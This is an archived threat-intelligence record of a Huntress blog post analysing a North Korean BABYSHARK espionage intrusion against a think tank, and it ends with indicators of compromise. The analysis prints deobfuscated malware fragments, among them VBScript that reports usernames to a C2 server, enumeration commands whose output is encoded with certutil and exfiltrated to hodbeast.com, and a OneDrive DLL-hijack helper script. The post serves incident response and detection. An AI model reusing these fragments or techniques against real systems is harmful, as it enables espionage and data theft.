{
	"id": "78785649-af72-4b93-8bef-18a357c02cec",
	"created_at": "2026-04-06T00:16:21.485806Z",
	"updated_at": "2026-04-10T03:20:40.637366Z",
	"deleted_at": null,
	"sha1_hash": "e523d1625e8b6aa299ff32e9ef5e94326f61544e",
	"title": "Targeted APT Activity: BABYSHARK Is Out for Blood | Huntress",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 9893741,
	"plain_text": "Targeted APT Activity: BABYSHARK Is Out for Blood | Huntress\r\nArchived: 2026-04-05 16:19:56 UTC\r\ntl;dr: This blog follows the ThreatOps investigation of targeted DPRK (North Korean) backed cyber espionage efforts\r\nagainst Nuclear Think Tanks. It details the threat hunt from beginning to end, including how our ThreatOps analysts found\r\nthe threat, how our team peeled back the layers to analyze the malicious activity and how the threat actors phished their way\r\ninto the partner's network in the first place. Scroll to the bottom for indicators of compromise.\r\nOn February 16, Huntress discovered malicious and targeted advanced persistent threat (APT) activity within a trialing\r\npartner organization. This activity aligns with known tradecraft attributed to North Korean threat actors targeting national\r\nsecurity think tanks.\r\nThe uncovered malware family, dubbed BABYSHARK by other researchers, is used by a DPRK state-sponsored threat\r\nactor. This variant was significantly customized and tailored to the specific victim environment, indicating a targeted attack. \r\nIn this blog, we'll pull back the curtain on the technical details, our internal process of investigation and the lessons learned\r\nfor the greater security community.\r\nRight of Boom and Backwards\r\nThis story begins with our tried-and-true service: detecting persistence, or how hackers establish and maintain access to their\r\nvictim. \r\nDiscovering persistence mechanisms keys us in that there was undeniably malicious threat actor behavior. We start with this\r\nscene of the crime, and then work backward, unveiling new clues and breadcrumbs to uncover the full picture. \r\nOnce our 24/7 Security analysts identified the activity, we began an investigation to identify how deep the rabbit hole went.\r\nOur initial discovery was a scheduled task, masquerading with the name GoogleUpdater that ran a VBScript script\r\nqwert.vbs. This is a commonly used technique (MITRE ATT\u0026CK T1035.005) to blend in and avoid detection by sounding\r\nlike something legitimate—in this case, Google. Using a legitimate file (wscript.exe) to run the malicious script further helps\r\nto avoid detection that is based on scanning of the binary that is running. \r\nqwert.vbs included code to reach out to a Google Drive file. \r\nhttps://www.huntress.com/blog/targeted-apt-activity-babyshark-is-out-for-blood\r\nPage 1 of 16\n\nViewing this Google Drive file, it turns out to be completely blank: an empty file. Note the lengthy filename at the very top\r\nof the display, however. \r\nDownloading the page with curl, we can see the HTML source of the Google Drive page—which does not appear to be\r\novertly malicious upon first glance. But taking a closer look, we uncovered some odd \"markers\" in the lengthy file name\r\ndisplayed.\r\nhttps://www.huntress.com/blog/targeted-apt-activity-babyshark-is-out-for-blood\r\nPage 2 of 16\n\nAside from what looked like gibberish, there were the strings \"manage\" with parentheses following it—almost to look like a\r\nfunction call, as if the parameters d=7 were passed in. Immediately following it was a johnbegin-- and a significant amount\r\nof nonsense characters, and eventually a --johnend string. The johnbegin and johnend text seemed to be delimiters to wrap\r\naround the random data… perhaps that was encoded data in some way!\r\nWith that breadcrumb, our ThreatOps team began looking over open-source research online to determine if others have seen\r\nthese \"johnbegin\" and \"johnend\" markings.\r\nNorth Korea's recent BabyShark malware works with the fileless technique by downloading encrypted malicious scripts\r\nfrom Google drive. Malicious scripts distinguish between start and end with \"johnbegin\" and \"johnend\".\r\npic.twitter.com/6INRjQeecs\r\n— IssueMakersLab (@issuemakerslab) March 21, 2020\r\nThanks to some shared intelligence by Palo Alto's Unit42, malware reporting sites and others, we were able to discover that\r\nthese delimiters were key indicators of a strain of malware dubbed BABYSHARK, known for being used by North Korean\r\nstate-sponsored threat actors. \r\nDoing our due diligence to read up on the great analysis and research from those who have seen this in the wild before us, it\r\nwas clear the previous sightings dated back to the 2018-2019 timeframe. For this specific incident, the first indicators of\r\ncompromise we uncovered were in March of 2021.\r\nKnowing that we were now digging into a malicious APT activity, we deployed our Process Insights functionality to\r\nthis host and organization for even greater visibility.\r\nhttps://www.huntress.com/blog/targeted-apt-activity-babyshark-is-out-for-blood\r\nPage 3 of 16\n\nPeeling Back the Layers\r\nWith a better understanding of what we were looking at, we continued to dig through the qwert.vbs sample. \r\nFrom reading the code, we could see that this scheduled VBScript would download the contents of this Google Drive page\r\non first execution and carve out the obfuscated data between the johnbegin and johnend delimiters to be saved as a file\r\nnormal.crp. Later, upon second execution by the scheduled task, the script deobfuscates the saved data and executes it as\r\nVBScript.\r\nConsidering we can see the deobfuscation routine, we can run that on our own and unravel what actual code would be\r\npresent and executed from normal.crp.\r\nNote: This screenshot is an excerpt of the code present and the full file can be reviewed with the gist link above.\r\nThere is a lot to unpack and discuss within this VBScript code. We will start with the most interesting observation: the\r\nmalware checks the current username.\r\nThe Cast of Characters\r\nWe want to emphasize that the observed APT activity is highly targeted against this organization and affiliated individuals. \r\nThe target organization fits the category of \"think tanks,\" as alluded to in the very beginning of this post. Additionally, this\r\ntarget's computer had a hostname referring to the owner and user—who, for partner confidentiality, we'll refer to as Alex.\r\nAlex's computer was not the only host in this organization that Huntress was supporting—other devices with a hostname\r\nbased on their user were visible to us, but during the time of our analysis, only Alex's machine was online. To tell the whole\r\nstory, we knew we needed access to another important user's machine. We will refer to this user as Bob.\r\nNotice that the normal.crp file specifically checks for the presence of the username \"Administrator,\" or our newly introduced\r\ncharacter, \"Bob.\" The malware would not run if it was not under Bob. If the current username did not match either of these\r\ntwo names, the malware will reach out to an HTTP C2 server. The malware will then stop itself from executing on the\r\nsystem.\r\nThis was particularly interesting to us. This attack was tailored to focus only on Bob. If (and only if) the username matched\r\nBob, then it would add persistence mechanisms in the Windows registry, stage new obfuscated files, and continue\r\ncommunications with its C2 servers.\r\nFollowing Breadcrumbs\r\nNoting the newly discovered activity from normal.crp,  we found several other persistence mechanisms on the host. We\r\ndiscovered the scheduled task named Microsoft-Windows-UpdateDefender that used another VBS script called sys0.vbs to\r\nopen up a registry key HKEY_CURRENT_USER\\Software\\RegisteredApplications\\[random] and perform some string\r\nreplacement on the data stored there and execute the contents.\r\nhttps://www.huntress.com/blog/targeted-apt-activity-babyshark-is-out-for-blood\r\nPage 4 of 16\n\n(This filename sys0.vbs differs from the suggested sys1.vbs name in the recovered normal.crp script, but after finding both\r\nrenditions on different hosts, both contain the same contents).\r\nExamining the contents of the task file showed that the commands were executed every 29 minutes, while sys1.vbs would\r\nbe executed every 61 minutes.\r\nThis was also confirmed by looking at the data collected by Process Insights. Process Insights is the newest addition to The\r\nHuntress Managed Security Platform, offering greater visibility and telemetry on actions performed on an endpoint at the\r\nprocess level. This captures information like process spawn time, origination, path and any subsequent child process data—\r\nin real-time. 😉\r\n(Click the above image to enlarge it)\r\nThe filexx.tmp and schedxx.tmp files were written to disk as means of checking if this code was executed previously. These\r\nfiles were not present on Alex's machine at the time of our analysis.\r\nThe registry value at\r\n\"HKEY_CURRENT_USER\\Software\\RegisteredApplications\\AppXr1bysyqf6kpaq1aje5sbadka8dgx3g4g\" contained even\r\nmore VBScript code.\r\nhttps://www.huntress.com/blog/targeted-apt-activity-babyshark-is-out-for-blood\r\nPage 5 of 16\n\nThis code reached out to a C2 domain to retrieve the contents for yet another new file, desktop.tmp, if it was not already\r\npresent. This code is exactly in line with what we uncovered from the normal.crp, but it pulls from a different C2 domain\r\n(worldinfocontact[.]club rather than hodbeast[.]com). \r\nThe distinction between these domains seemed to be that worldinfocontact[.]club is their beaconing command and control. It\r\nreached out to this C2 on a set interval, retrieved any pending commands to be executed, slept, then executed those new\r\ntasks. The response from worldinfocontact[.]club /111/alex/expres[.]php?op=2 was inherently going to vary from time to\r\ntime as the threat actors queued new commands and scripts to execute remotely.\r\nThe contents of desktop.tmp were then subsequently changing as they were the last set of commands sent by the C2 server. \r\nThe desktop.tmp file contents we uncovered on Alex's machine were obfuscated commands to run the OneDrive.exe\r\nprocess. It is fair to say that this is the \"fallback\" procedure from the C2 (when no other commands were pending) to ensure\r\nwhatever DLL hijacking they set up would continue to execute, even if the OneDrive process was stopped. We will revisit\r\nthe alleged DLL hijacking technique in our analysis of other artifacts soon.\r\nThis deobfuscated desktop.tmp on Alex's host is below:\r\nOn Error Resume Next:Set\r\nwShell=CreateObject(\"WScript.Shell\"):retu=wShell.run(\"\"\"%userprofile%\\AppData\\Local\\Microsoft\\OneDrive\\onedrive.exe\"\"\r\n/background\",0,false)\r\nBear in mind that this was returned from the worldinfocontact[.]club endpoint. However, hodbeast[.]com, on the other hand,\r\nreturned obfuscated syntax that would ultimately run some enumeration commands and write the output to a file ttmp1.log.\r\ncmd.exe /c PowerShell Get-Process outlook ^| Format-List Path \r\ncmd.exe /c whoami\r\ncmd.exe /c net user\r\ntasklist\r\nThe ttmp1.log file is then Base64 encoded with certutil -f -encode to be saved as ttmp.log and then uploaded to\r\nhttps[:]//hodbeast.com/silver/upload[.]php with a POST request.\r\nThis data exfiltration technique is in line with previous sightings and is known in the MITRE ATT\u0026CK page for\r\nBABYSHARK malware.\r\nFinally, other files present on Alex's machine were desktop.r5u and desktop.xml. These files had identical contents. The\r\n\"BEGIN\" and \"END\" certificate delimiters indicate this file would also be unraveled with certutil.\r\nhttps://www.huntress.com/blog/targeted-apt-activity-babyshark-is-out-for-blood\r\nPage 6 of 16\n\ndesktop.r5u and desktop.xml decode to a RAT.\r\nLooking at the first few characters (]TVqQAA) we can see that this is probably a base64 encoded PE file.  Indeed, using\r\nCyberChef, we can decode the base64 text to obtain a DLL file. \r\nLoading the DLL in pestudio reveals a pdb path that leaves nothing to the imagination:\r\n\"H:\\Hollow\\googleDrive_rat_load_complete\\rat_load\\Release\\rat_load.pdb\"\r\nIt's worth noting that this file cannot be found in VirusTotal. While we have not yet finished our analysis on this DLL, it is\r\nnot a stretch to consider this could be a variant of the KimJongRAT known to be often used alongside BABYSHARK.\r\nThe desktop.xml file seems to copy itself to (or possibly check for) desktop.r5u file in %appdata\\roaming\\Microsoft%\r\ndirectory as this can be found hardcoded in the binary.\r\nIt also contains references to the following DLLs within an embedded PE file:\r\nThe exports from this binary are as follows: \r\nhttps://www.huntress.com/blog/targeted-apt-activity-babyshark-is-out-for-blood\r\nPage 7 of 16\n\nIf there weren't already enough moving pieces to this story, we uncovered even more activity through wscript.exe with our\r\nProcess Insights capability. Alongside the running scheduled tasks, there was an occurrence of a script CF8C.vbs being run\r\nout of Alex's temporary directory. \r\nwscript.exe C:\\Users\\Alex\\AppData\\Local\\Temp\\CF8C.vbs [MoreVBScript]\r\nThis CF8C.vbs file was no longer present on the host, but considering it had practically the contents of another script passed\r\nas another argument, it was clear it would again deobfuscate or substitute symbols and execute more VBScript.\r\nThis deobfuscated VBScript reaches out to a OneDrive link, a tactic once again referenced in other public research, then\r\ndeobfuscates and executes the supplied VBScript.\r\nThis decodes to...\r\nOn Error Resume Next:Set fs = CreateObject(\"Scripting.FileSystemObject\"):Set ws=CreateObject(\"WScript.Shell\"):Set p0\r\n= CreateObject(\"msxml2.xmlhttp\"):scriptdir = ws.ExpandEnvironmentStrings(\"%appdata%\"):userdir =\r\nws.ExpandEnvironmentStrings(\"%userprofile%\"):username =\r\nlcase(ws.ExpandEnvironmentStrings(\"%username%\")):username=Escape(username):username=Replace(username,\"%u\",\"\"):chk=\"no\":username=lcas\r\n\"GET\", \"https://frebough.com/onedrive/winmm.php?op=\" +username,false:p0.setRequestHeader \"Content-Type\",\r\n\"application/x-www-form-urlencoded\":p0.Send\r\nPresumably, this is to tell yet another C2 server that this step is completed. It does not seem to execute more code from the\r\nresponse.\r\nAdditional Artifacts\r\nAlongside the qwert.vbs file we found on Alex’s host, we uncovered multiple other strange files.\r\nr.vbs seemed to kill the OneDrive.exe process, wait three seconds, and remove a version.dll file present in the same directory\r\nas the OneDrive executable. Then, five seconds later, it runs the OneDrive.exe process once more.\r\nOn Error Resume Next\r\nSet wShell=CreateObject(\"WScript.Shell\")\r\nretu=wShell.run(\"cmd.exe /c taskkill /im onedrive.exe /f \u0026 timeout 3\u0026 del\r\n\"\"%userprofile%\\AppData\\Local\\Microsoft\\OneDrive\\version.dll\"\"\",0,true)\r\nhttps://www.huntress.com/blog/targeted-apt-activity-babyshark-is-out-for-blood\r\nPage 8 of 16\n\nretu=wShell.run(\"cmd.exe /c timeout 5\",0,true)\r\nretu=wShell.run(\"\"\"%userprofile%\\AppData\\Local\\Microsoft\\OneDrive\\onedrive.exe\"\" /background\",0,false)\r\nUnfortunately we were unable to find the version.dll file on Alex's host or any other affected machines. Considering the file\r\nplacement, this looks to be a known DLL hijacking technique to run additional code.\r\nConsidering this script removes the version.dll file, once again runs OneDrive with normal execution, and the slight\r\nfilename “r.vbs” perhaps this is a mechanism to “remove” another implant. We later discovered this same code on Bob’s\r\nmachine under the filename 1.vbs.\r\nAdditionally, a dev.ps1 file was found on the affected host. This used inline C# code within PowerShell to seemingly track\r\nGoogle Chrome and Microsoft Edge tabs, monitor the use of Browser Developer Tools and log these to a tabid_chrome.log,\r\ntabid_edge.log and a living.log file that was updated the current date and time. These log files contained nothing more than\r\nan identification number for each tab, but we could see from the living.log file that this code was actively running on the\r\nvictim.\r\n(We later discovered dev.vbs on Bob’s machine which looks to kickstart the dev.ps1 file—also present with the same\r\ncontents under the filename onenote.vbs.)\r\nOn a separate user’s machine (we will call them Charlie for the sake of storytelling) we discovered the onenote.vbs file with\r\nslightly different contents to invoke the PowerShell script with a different technique, as well as a new pow.ps1 that looked to\r\nremove Google Chrome security preferences.\r\nPutting the Puzzle Pieces Together\r\nWhile we continued to do analysis on the files and threads we uncovered, we knew we were slowly building the big picture\r\nof this attack chain. Considering how BABYSHARK malware would traditionally be run, we knew we were still missing\r\none critical piece of information: the initial access where this all started from. Where was the phish?\r\nThe first step in finding initial access was to figure out the timeframe of the compromise. To do that, we searched for other\r\ninteresting files on the machines. The earliest found script file was the sys0.vbs script we found earlier. The timestamps for\r\nthis file placed our timeline starting on March 9, 2021. This helped us narrow down the timeframe from when the malicious\r\ndocument(s) may have been downloaded.\r\nThe APT group is known to use spear phishing emails with malicious links embedded or malicious documents attached to\r\ngain access, so we started hunting for them on the system. Being extremely cautious of what we could dig through, we\r\nexamined only suspicious Microsoft Office during the early months of 2021.\r\nUnfortunately, we couldn’t find a smoking gun. But at that time, only Alex's computer was online and communicating with\r\nHuntress.\r\nAs we communicated with this trialing partner, explaining what we uncovered and the gravity of this incident, they notified\r\nthe players involved. Soon enough, the other compromised machines (Bob's and Charlie's, specifically) came online.\r\nWith those hosts now accessible to Huntress, we could correlate what files were present across all of these compromised\r\nmachines. While the AV product the organization was using did not stop the intrusion, it at the very least had logs of what\r\nfiles were scanned and when.\r\nUsing the logs across all three hosts, we uncovered only a handful of files that were present on each host. The most\r\ninteresting file that stuck out to us was VOA_Korea.zip. From the logs, we could tell it had a .doc file inside of it, and this\r\nseemed promising. We also noticed that the scanning of the ZIP file and its contents failed. This could be indicative of\r\npassword protection.\r\nIf you hadn’t caught on to the acronym, the VOA in this case refers to the Voice of America media organization. Voice of\r\nAmerica is an international broadcasting station in the United States, focusing on offering information and news from\r\ncountries and continents all over the world.\r\nAttempting to retrieve the VOA_Korea.zip file, it was unfortunately no longer present on each of the compromised\r\nmachines.\r\nAV logs revealed that the end user attempted to download this file two times.\r\nhttps://www.huntress.com/blog/targeted-apt-activity-babyshark-is-out-for-blood\r\nPage 9 of 16\n\nFinding the Phish\r\nThere was still a VOA_Korea (1).zip that was present and we were able to retrieve the file. Uncompressing the archive, we\r\nhit another wall—the .doc file was password protected. This doubles as both a sneaky phishing tactic, but also to potentially\r\nhide malicious macros from antivirus software.\r\nIt was at this point that we went from hunting to hacking and started trying to crack open the file. We do say our offense is\r\nyour defense, after all! 😉\r\nAfter throwing combinations of John The Ripper and Hashcat with different wordlists and rule files, eventually, a boring,\r\nbasic bruteforce found the password: voa2021.\r\nWith a rush of adrenaline, we went to examine the decrypted Microsoft Word document, opting for the one of quickest tools\r\nfor macro analysis, olevba.\r\nThe .doc file lit up like a Christmas tree.\r\nWe found the malicious macro document used for initial access! After some quick deobfuscating (same technique as seen\r\npreviously), we could see the whole picture for this attack.\r\nThis macro tells the story for almost each of the puzzle pieces we had uncovered previously.\r\nChecks for the presence of OneDrive\r\nDownloads a new Microsoft Word document to show the user and convince them of the phish:\r\n(http[:]//beastmodser.club/sil/0304/VOA_Korea[.]docx)\r\nChecks for the presence of antivirus products like BitDefender or Norton Security, and quits if present\r\nDisables Microsoft Word macro protections in registry\r\nDownloads a version.tmp file to be then moved and renamed as version.dll for the OneDrive DLL hijacking attack\r\n(https[:]//beastmodser.club/sil/0304/d[.]php?na=version.gif)\r\nStarts OneDriveStandaloneUpdater.exe to begin the DLL hijacking attack\r\nhttps://www.huntress.com/blog/targeted-apt-activity-babyshark-is-out-for-blood\r\nPage 10 of 16\n\nChecking for the presence of antivirus or security software is a common technique for sophisticated malware samples, but\r\nthis adds to the stealth of the operation. The malicious macro bailing out and not detonating if there are certain products\r\npresent makes this even more targeted.\r\nWhile this explained the version.dll, unfortunately, we were unable to retrieve the original file from the malicious hosting\r\nURL. Neither the faked VOA_Korea.docx file or the DLL were still present on the newfound beastmodser[.]club domain…\r\nbut it is at least known evil. 😉\r\nOther reports on BABYSHARK malware have explained how it does disable macro warnings and Microsoft Office security\r\nprotections. This was very evident in the code run by the macro…changing registry values to disable defense across\r\npractically every version of Microsoft Word.\r\nA quick synopsis of the commands ran within that macro:\r\nLures and Phishbait\r\nWith the discovery of the initial attack vector and phishing document, and after analysis of the pertinent files to determine\r\nthe scope of this attack, we felt this investigation was coming to a close. But even after finding the malicious macro, we\r\nwere still curious—what convinced Alex to open this file?\r\nhttps://www.huntress.com/blog/targeted-apt-activity-babyshark-is-out-for-blood\r\nPage 11 of 16\n\nThe “lure” looked safe and secure, tucked away inside of a ZIP file with a password-protected document… what was the\r\npretense?\r\nWe asked the trialing partner if they could find the original email. Here we showcase a fascinating back-and-forth with some\r\ncunning deception and a well-played scheme.\r\nThe threat actor reaches out to Alex under the guise of collecting info for the VOA, masquerading as a real VOA author (that\r\nauthor link is legitimate, along with the Twitter profile). There is no attachment—they ask for input from the victim.\r\nAlex falls for the bait, but there is at least one clue that suggests this may have originated from an illegitimate source:\r\nVoice of America probably doesn’t use Yahoo as their email provider. 🥴\r\nAlex has no cause for concern here—they sent them a document with answers to their questions. For the final trick, our\r\nthreat actor suggests they have “made some edits” and are sending the last copy back for final approval. To “be secure,” the\r\ndocument is password protected. 😈\r\nhttps://www.huntress.com/blog/targeted-apt-activity-babyshark-is-out-for-blood\r\nPage 12 of 16\n\nThere is the smoking gun—a OneDrive link with the hosted download for our VOA_Korea.zip file, with the password-protected Word document with the macro that kickstarts this compromise.\r\nThinking back to the malicious VBScript, wasn’t the target Bob, and not Alex? The threat actor may have used a roundabout\r\nmethod to get the true victim… but it worked.\r\nAlex forwarded the email to their co-workers for their approval and carbon-copied the other victims.\r\nThere is no further correspondence in the email chain. The threat actor had what they wanted, and the victims were unaware\r\nthey had just been phished—because it was, after all, a very clever ploy.\r\nAfter we had finished our investigation and shared everything learned with the targeted organization, we continued our\r\nanalysis. We found one particularly interesting news article dating back to December of 2021: “Hackers use fake media\r\ndomains to trick North Korea researchers”... specifically VOA, under the very same guise.\r\nLooking back, this was very clever malware filled with living-off-the-land techniques, using normally trusted software with\r\nOneDrive and Google Drive, staged with a particular stealthy phishing lure… but, we were disappointed in what earned the\r\ndamning click.\r\nhttps://www.huntress.com/blog/targeted-apt-activity-babyshark-is-out-for-blood\r\nPage 13 of 16\n\nThe malicious Word document itself is the most cookie-cutter, vanilla phish bait that one might see in generic and bland\r\ncybersecurity training. Despite how often security professionals scream and shout about these barebone basics of security\r\nhygiene, still this can slip by and damage an organization.\r\n“Please click here” is all an APT needs.\r\nLessons Learned\r\nThe adversary here is likely a well-funded nation-state-supported threat actor, whose operations are known for their phishing\r\nprowess and building trust or a connection before dangling the lure. The remote access trojan and data exfiltration\r\ncapabilities have been present and active in the target environment for nearly a year.\r\nWe tend to share statistics and infographics about hacker dwell-time being weeks, or months, but this malware has gone\r\nunnoticed for much longer. While the victim organization had antivirus, the threat still slipped past. From our own analysis,\r\nlooking through the logs, it is disheartening to see the exact moment where prevention efforts fell short.\r\nWith that, we offer a gentle reminder: prevention will fail. There is immense value, though, in logging, monitoring, and\r\nhunting. All the threads of this story could not have unfolded without the data retention and logged information available to\r\nour team of analysts and investigators.\r\nWhether the infecting malware stems from an unskilled actor, just grabbing code off the shelf, or a trained and sophisticated\r\nAPT, detection and human analysis must be in play.\r\nThe Huntress Managed Security Platform has been augmenting more features and functionality to enrich our partners'\r\nreporting and insight. Combining the powers of each of these services (Persistent Footholds, Managed Antivirus, Process\r\nInsights, etc.), we can gain a greater understanding of incidents and compromises—and for finding APT activity on a trialing\r\npartner's system, we hope that offers a great example.\r\n• • •\r\nSpecial thanks to analysts, researchers, account representatives, engineers and all involved in response to this\r\nincident and their contributions to this blog: Cat Contillo, Matt Anderson, Caleb Stewart, Dave Kleinatland, John\r\nHammond, Matthew Brennan, Tim Kasper, Clarissa Bove, Jamie Levy, Max Rogers, Greg Ake, Rob Noeth and Sharon\r\nMartin.\r\nIndicators of Compromise\r\nType Item Notes / sha256 Hash\r\nhttps://www.huntress.com/blog/targeted-apt-activity-babyshark-is-out-for-blood\r\nPage 14 of 16\n\nURL retmodul[.]com\r\nAccessed during execution of normal.crp.  May be used to\r\nattack.\r\nURL hodbeast[.]com Staging C2 url\r\nURL worldinfocontact[.]club Beaconing C2 url\r\nURL frebough[.]com Staging C2 url\r\nURL beastmodser[.]club Staging C2 url\r\nStrings H:\\Hollow\\googleDrive_rat_load_complete\\rat_load\\Release\\rat_load.pdb String in desktop.xml and desktop.r5u\r\nRegistry\r\nKey\r\nHKEY_CURRENT_USER\\Software\\RegisteredApplications\\[random\r\ncharacters]\r\nContained code that was executed by sys0.vbs\r\nFile c:\\Users\\\\AppData\\Roaming\\desktop.tmp 5b31d65b0607ae3de40ff8376bb83f3ff4defba3b564c380be\r\nFile C:\\Users\\\\AppData\\Roaming\\r.vbs c86d6e9dfc79bdf29f0826327992f8cf3df3e1ed6b41f1c8f6e\r\nFile C:\\Users\\\\AppData\\Roaming\\1.vbs c86d6e9dfc79bdf29f0826327992f8cf3df3e1ed6b41f1c8f6e\r\nFile C:\\Users\\\\Microsoft\\sys0.vbs bf82675bac2cd574fa8b87659217bffb29d4bc49b355b405a\r\nFile C:\\Users\\\\Microsoft\\sys1.vbs bf82675bac2cd574fa8b87659217bffb29d4bc49b355b405a\r\nFile C:\\Users\\\\AppData\\Roaming\\Microsoft\\desktop.xml\r\nAs a certificate:\r\n2ad3266331e405677c68bb43c490467107ca398d3ce43008\r\nConverted DLL:\r\ne314b40449b7b9b84f20f49f89888511433573377e007e5c1\r\nFile C:\\Users\\\\AppData\\Roaming\\Microsoft\\desktop.r5u\r\nAs a certificate:\r\n2ad3266331e405677c68bb43c490467107ca398d3ce43008\r\nConverted DLL:\r\ne314b40449b7b9b84f20f49f89888511433573377e007e5c1\r\nFile C:\\Users\\\\AppData\\Local\\Microsoft\\OneDrive\\version.dll [hash unavailable]\r\nFile C:\\Users\\\\AppData\\Local\\Microsoft\\OneDrive\\version.tmp [hash unavailable]\r\nFile C:\\Users\\\\AppData\\Roaming\\normal.crp e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca4\r\nFile C:\\Users\\\\AppData\\Roaming\\Microsoft\\Windows\\qwert.vbs e08fe0b287b4d112514276c2b102b9c80b4dab73257f06ab\r\nFile C:\\Users\\\\AppData\\Microsoft\\ttmp.log [hash unavailable]\r\nFile C:\\Users\\\\AppData\\Microsoft\\filexx.tmp\r\nChecked by normal.crp for run status, created if not run pr\r\nare 111\r\nFile C:\\Users\\\\AppData\\Microsoft\\schedxx.tmp\r\nChecked by normal.crp for run status, created if not run pr\r\nare 111\r\nFile C:\\Users\\\\AppData\\Local\\Temp\\CF8C.vbs [hash unavailable]\r\nFile C:\\Users\\\\AppData\\Roaming\\Microsoft\\dev.ps1 def0975728fc5da61c022bb62b7160e2764631b852ec7f839\r\nFile C:\\Users\\\\AppData\\Roaming\\Microsoft\\pow.ps1 d41c943fd5ffacde74f487df6a43b72e9730f05812b9b1f8dc\r\nFile c:\\users\\\\appdata\\roaming\\Microsoft\\living.log (Hash varies based off the current time)\r\nFile C:\\Users\\\\AppData\\Roaming\\Microsoft\\tabid_chrome.log (Hash varies due to logging)\r\nFile C:\\Users\\\\AppData\\Roaming\\Microsoft\\tabid_edge.log (Hash varies due to logging)\r\nFile\r\nc:\\Users\\\\AppData\\Roaming\\microsoft\\Windows\\start\r\nmenu\\Programs\\Startup\\OneNote.vbs\r\nc327631a212e4a9681e3cf1574c500ce3700186cc605ae08d\r\n(Note: hash may vary across different machines)\r\nhttps://www.huntress.com/blog/targeted-apt-activity-babyshark-is-out-for-blood\r\nPage 15 of 16\n\nJohn Hammond. Threat hunter. Education enthusiast. Senior Security Researcher at Huntress.\r\nSource: https://www.huntress.com/blog/targeted-apt-activity-babyshark-is-out-for-blood\r\nhttps://www.huntress.com/blog/targeted-apt-activity-babyshark-is-out-for-blood\r\nPage 16 of 16",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.huntress.com/blog/targeted-apt-activity-babyshark-is-out-for-blood"
	],
	"report_names": [
		"targeted-apt-activity-babyshark-is-out-for-blood"
	],
	"threat_actors": [],
	"ts_created_at": 1775434581,
	"ts_updated_at": 1775791240,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/e523d1625e8b6aa299ff32e9ef5e94326f61544e.pdf",
		"text": "https://archive.orkl.eu/e523d1625e8b6aa299ff32e9ef5e94326f61544e.txt",
		"img": "https://archive.orkl.eu/e523d1625e8b6aa299ff32e9ef5e94326f61544e.jpg"
	}
}